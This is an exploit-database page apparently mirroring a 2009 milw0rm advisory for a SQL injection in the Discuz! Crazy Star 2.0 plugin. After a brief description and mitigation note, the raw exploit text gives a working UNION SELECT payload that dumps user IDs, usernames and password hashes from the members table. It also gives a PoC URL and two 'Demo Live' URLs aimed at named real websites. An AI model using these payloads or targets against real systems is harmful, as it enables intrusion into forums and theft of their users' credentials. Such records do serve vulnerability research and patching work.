Discuz! Plugin Crazy Star - exploit.company

vendor:

Discuz! Plugin Crazy Star

by:

ZhaoHuAn

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Discuz! Plugin Crazy Star

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:discuz:discuz_plugin_crazy_star

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability

Discuz! Plugin Crazy Star version 2.0 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

============================================================
Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
============================================================

========================[Author]============================                    

 [+] Founded 	: ZhaoHuAn				     
 [+] Contact	: ZhengXing[at]shandagames[dot]com	         
 [+] Blog	: http://www.patching.net/zhaohuan/	         
 [+] Date	: August, 26th 2009 [Double Seventh Festival]	 
								 
========================[Soft Info]=========================		 
								 
Software: Discuz! Plugin Crazy Star(family)		         
Version	: 2.0					                 
Vendor	: http://www.discuz.com			             	 



[-] Exploit:
[+] 1) Register a User
    2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
    [?] = Valid fmid Number

[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--

[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\  

  Today is the VALENTINE'S Day in China, the seventh day of the seventh lunar month.
  Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky  ;) 
  Greetz : Weeny <- love u more & more

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-08-26]